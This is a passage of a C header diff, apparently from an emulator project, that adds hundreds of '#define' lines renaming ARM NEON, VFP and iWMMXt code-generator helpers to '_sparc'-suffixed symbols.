gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_sparc +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_sparc +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_sparc +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_sparc +#define 
gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_sparc +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_sparc +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_sparc +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_sparc +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_sparc +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_sparc +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_sparc +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_sparc +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_sparc +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_sparc +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_sparc +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_sparc +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_sparc +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_sparc +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_sparc +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_sparc +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_sparc +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_sparc +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_sparc +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_sparc +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_sparc +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_sparc +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_sparc +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_sparc +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_sparc +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_sparc +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_sparc +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_sparc +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_sparc +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_sparc 
+#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_sparc +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_sparc +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_sparc +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_sparc +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_sparc +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_sparc +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_sparc +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_sparc +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_sparc +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_sparc +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_sparc +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_sparc +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_sparc +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_sparc +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_sparc +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_sparc +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_sparc +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_sparc +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_sparc +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_sparc +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_sparc +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_sparc +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_sparc +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_sparc +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_sparc +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_sparc +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_sparc +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_sparc +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_sparc +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_sparc +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_sparc +#define 
gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_sparc +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_sparc +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_sparc +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_sparc +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_sparc +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_sparc +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_sparc +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_sparc +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_sparc +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_sparc +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_sparc +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_sparc +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_sparc +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_sparc +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_sparc +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_sparc +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_sparc +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_sparc +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_sparc +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_sparc +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_sparc +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_sparc +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_sparc +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_sparc +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_sparc +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_sparc +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_sparc +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_sparc +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_sparc +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_sparc +#define gen_helper_neon_narrow_round_high_u16 
gen_helper_neon_narrow_round_high_u16_sparc +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_sparc +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_sparc +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_sparc +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_sparc +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_sparc +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_sparc +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_sparc +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_sparc +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_sparc +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_sparc +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_sparc +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_sparc +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_sparc +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_sparc +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_sparc +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_sparc +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_sparc +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_sparc +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_sparc +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_sparc +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_sparc +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_sparc +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_sparc +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_sparc +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_sparc +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_sparc +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_sparc +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_sparc +#define gen_helper_neon_qadd_s16 
gen_helper_neon_qadd_s16_sparc +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_sparc +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_sparc +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_sparc +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_sparc +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_sparc +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_sparc +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_sparc +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_sparc +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_sparc +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_sparc +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_sparc +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_sparc +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_sparc +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_sparc +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_sparc +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_sparc +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_sparc +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_sparc +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_sparc +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_sparc +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_sparc +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_sparc +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_sparc +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_sparc +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_sparc +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_sparc +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_sparc +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_sparc +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_sparc +#define gen_helper_neon_qshl_u8 
gen_helper_neon_qshl_u8_sparc +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_sparc +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_sparc +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_sparc +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_sparc +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_sparc +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_sparc +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_sparc +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_sparc +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_sparc +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_sparc +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_sparc +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_sparc +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_sparc +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_sparc +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_sparc +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_sparc +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_sparc +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_sparc +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_sparc +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_sparc +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_sparc +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_sparc +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_sparc +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_sparc +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_sparc +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_sparc +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_sparc +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_sparc +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_sparc +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_sparc +#define 
gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_sparc +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_sparc +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_sparc +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_sparc +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_sparc +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_sparc +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_sparc +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_sparc +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_sparc +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_sparc +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_sparc +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_sparc +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_sparc +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_sparc +#define gen_helper_neon_tbl gen_helper_neon_tbl_sparc +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_sparc +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_sparc +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_sparc +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_sparc +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_sparc +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_sparc +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_sparc +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_sparc +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_sparc +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_sparc +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_sparc +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_sparc +#define gen_helper_neon_zip16 gen_helper_neon_zip16_sparc +#define gen_helper_neon_zip8 gen_helper_neon_zip8_sparc +#define gen_helper_pre_hvc gen_helper_pre_hvc_sparc +#define gen_helper_pre_smc gen_helper_pre_smc_sparc +#define gen_helper_qadd16 gen_helper_qadd16_sparc 
+#define gen_helper_qadd8 gen_helper_qadd8_sparc +#define gen_helper_qaddsubx gen_helper_qaddsubx_sparc +#define gen_helper_qsub16 gen_helper_qsub16_sparc +#define gen_helper_qsub8 gen_helper_qsub8_sparc +#define gen_helper_qsubaddx gen_helper_qsubaddx_sparc +#define gen_helper_rbit gen_helper_rbit_sparc +#define gen_helper_recpe_f32 gen_helper_recpe_f32_sparc +#define gen_helper_recpe_u32 gen_helper_recpe_u32_sparc +#define gen_helper_recps_f32 gen_helper_recps_f32_sparc +#define gen_helper_rintd gen_helper_rintd_sparc +#define gen_helper_rintd_exact gen_helper_rintd_exact_sparc +#define gen_helper_rints gen_helper_rints_sparc +#define gen_helper_rints_exact gen_helper_rints_exact_sparc +#define gen_helper_ror_cc gen_helper_ror_cc_sparc +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_sparc +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_sparc +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_sparc +#define gen_helper_sadd16 gen_helper_sadd16_sparc +#define gen_helper_sadd8 gen_helper_sadd8_sparc +#define gen_helper_saddsubx gen_helper_saddsubx_sparc +#define gen_helper_sar_cc gen_helper_sar_cc_sparc +#define gen_helper_sdiv gen_helper_sdiv_sparc +#define gen_helper_sel_flags gen_helper_sel_flags_sparc +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_sparc +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_sparc +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_sparc +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_sparc +#define gen_helper_set_rmode gen_helper_set_rmode_sparc +#define gen_helper_set_user_reg gen_helper_set_user_reg_sparc +#define gen_helper_shadd16 gen_helper_shadd16_sparc +#define gen_helper_shadd8 gen_helper_shadd8_sparc +#define gen_helper_shaddsubx gen_helper_shaddsubx_sparc +#define gen_helper_shl_cc gen_helper_shl_cc_sparc +#define gen_helper_shr_cc gen_helper_shr_cc_sparc +#define gen_helper_shsub16 gen_helper_shsub16_sparc +#define gen_helper_shsub8 gen_helper_shsub8_sparc +#define 
gen_helper_shsubaddx gen_helper_shsubaddx_sparc +#define gen_helper_ssat gen_helper_ssat_sparc +#define gen_helper_ssat16 gen_helper_ssat16_sparc +#define gen_helper_ssub16 gen_helper_ssub16_sparc +#define gen_helper_ssub8 gen_helper_ssub8_sparc +#define gen_helper_ssubaddx gen_helper_ssubaddx_sparc +#define gen_helper_sub_saturate gen_helper_sub_saturate_sparc +#define gen_helper_sxtb16 gen_helper_sxtb16_sparc +#define gen_helper_uadd16 gen_helper_uadd16_sparc +#define gen_helper_uadd8 gen_helper_uadd8_sparc +#define gen_helper_uaddsubx gen_helper_uaddsubx_sparc +#define gen_helper_udiv gen_helper_udiv_sparc +#define gen_helper_uhadd16 gen_helper_uhadd16_sparc +#define gen_helper_uhadd8 gen_helper_uhadd8_sparc +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_sparc +#define gen_helper_uhsub16 gen_helper_uhsub16_sparc +#define gen_helper_uhsub8 gen_helper_uhsub8_sparc +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_sparc +#define gen_helper_uqadd16 gen_helper_uqadd16_sparc +#define gen_helper_uqadd8 gen_helper_uqadd8_sparc +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_sparc +#define gen_helper_uqsub16 gen_helper_uqsub16_sparc +#define gen_helper_uqsub8 gen_helper_uqsub8_sparc +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_sparc +#define gen_helper_usad8 gen_helper_usad8_sparc +#define gen_helper_usat gen_helper_usat_sparc +#define gen_helper_usat16 gen_helper_usat16_sparc +#define gen_helper_usub16 gen_helper_usub16_sparc +#define gen_helper_usub8 gen_helper_usub8_sparc +#define gen_helper_usubaddx gen_helper_usubaddx_sparc +#define gen_helper_uxtb16 gen_helper_uxtb16_sparc +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_sparc +#define gen_helper_v7m_msr gen_helper_v7m_msr_sparc +#define gen_helper_vfp_absd gen_helper_vfp_absd_sparc +#define gen_helper_vfp_abss gen_helper_vfp_abss_sparc +#define gen_helper_vfp_addd gen_helper_vfp_addd_sparc +#define gen_helper_vfp_adds gen_helper_vfp_adds_sparc +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_sparc 
+#define gen_helper_vfp_cmped gen_helper_vfp_cmped_sparc +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_sparc +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_sparc +#define gen_helper_vfp_divd gen_helper_vfp_divd_sparc +#define gen_helper_vfp_divs gen_helper_vfp_divs_sparc +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_sparc +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_sparc +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_sparc +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_sparc +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_sparc +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_sparc +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_sparc +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_sparc +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_sparc +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_sparc +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_sparc +#define gen_helper_vfp_mins gen_helper_vfp_mins_sparc +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_sparc +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_sparc +#define gen_helper_vfp_muld gen_helper_vfp_muld_sparc +#define gen_helper_vfp_muls gen_helper_vfp_muls_sparc +#define gen_helper_vfp_negd gen_helper_vfp_negd_sparc +#define gen_helper_vfp_negs gen_helper_vfp_negs_sparc +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_sparc +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_sparc +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_sparc +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_sparc +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_sparc +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_sparc +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_sparc +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_sparc +#define 
gen_helper_vfp_subd gen_helper_vfp_subd_sparc +#define gen_helper_vfp_subs gen_helper_vfp_subs_sparc +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_sparc +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_sparc +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_sparc +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_sparc +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_sparc +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_sparc +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_sparc +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_sparc +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_sparc +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_sparc +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_sparc +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_sparc +#define gen_helper_vfp_touid gen_helper_vfp_touid_sparc +#define gen_helper_vfp_touis gen_helper_vfp_touis_sparc +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_sparc +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_sparc +#define gen_helper_vfp_tould gen_helper_vfp_tould_sparc +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_sparc +#define gen_helper_vfp_touls gen_helper_vfp_touls_sparc +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_sparc +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_sparc +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_sparc +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_sparc +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_sparc +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_sparc +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_sparc +#define gen_helper_wfe gen_helper_wfe_sparc +#define gen_helper_wfi gen_helper_wfi_sparc +#define gen_hvc gen_hvc_sparc +#define gen_intermediate_code_internal 
gen_intermediate_code_internal_sparc +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_sparc +#define gen_iwmmxt_address gen_iwmmxt_address_sparc +#define gen_iwmmxt_shift gen_iwmmxt_shift_sparc +#define gen_jmp gen_jmp_sparc +#define gen_load_and_replicate gen_load_and_replicate_sparc +#define gen_load_exclusive gen_load_exclusive_sparc +#define gen_logic_CC gen_logic_CC_sparc +#define gen_logicq_cc gen_logicq_cc_sparc +#define gen_lookup_tb gen_lookup_tb_sparc +#define gen_mov_F0_vreg gen_mov_F0_vreg_sparc +#define gen_mov_F1_vreg gen_mov_F1_vreg_sparc +#define gen_mov_vreg_F0 gen_mov_vreg_F0_sparc +#define gen_muls_i64_i32 gen_muls_i64_i32_sparc +#define gen_mulu_i64_i32 gen_mulu_i64_i32_sparc +#define gen_mulxy gen_mulxy_sparc +#define gen_neon_add gen_neon_add_sparc +#define gen_neon_addl gen_neon_addl_sparc +#define gen_neon_addl_saturate gen_neon_addl_saturate_sparc +#define gen_neon_bsl gen_neon_bsl_sparc +#define gen_neon_dup_high16 gen_neon_dup_high16_sparc +#define gen_neon_dup_low16 gen_neon_dup_low16_sparc +#define gen_neon_dup_u8 gen_neon_dup_u8_sparc +#define gen_neon_mull gen_neon_mull_sparc +#define gen_neon_narrow gen_neon_narrow_sparc +#define gen_neon_narrow_op gen_neon_narrow_op_sparc +#define gen_neon_narrow_sats gen_neon_narrow_sats_sparc +#define gen_neon_narrow_satu gen_neon_narrow_satu_sparc +#define gen_neon_negl gen_neon_negl_sparc +#define gen_neon_rsb gen_neon_rsb_sparc +#define gen_neon_shift_narrow gen_neon_shift_narrow_sparc +#define gen_neon_subl gen_neon_subl_sparc +#define gen_neon_trn_u16 gen_neon_trn_u16_sparc +#define gen_neon_trn_u8 gen_neon_trn_u8_sparc +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_sparc +#define gen_neon_unzip gen_neon_unzip_sparc +#define gen_neon_widen gen_neon_widen_sparc +#define gen_neon_zip gen_neon_zip_sparc +#define gen_new_label gen_new_label_sparc +#define gen_nop_hint gen_nop_hint_sparc +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_sparc +#define 
gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_sparc +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_sparc +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_sparc +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_sparc +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_sparc +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_sparc +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_sparc +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_sparc +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_sparc +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_sparc +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_sparc +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_sparc +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_sparc +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtub_M0_wRn 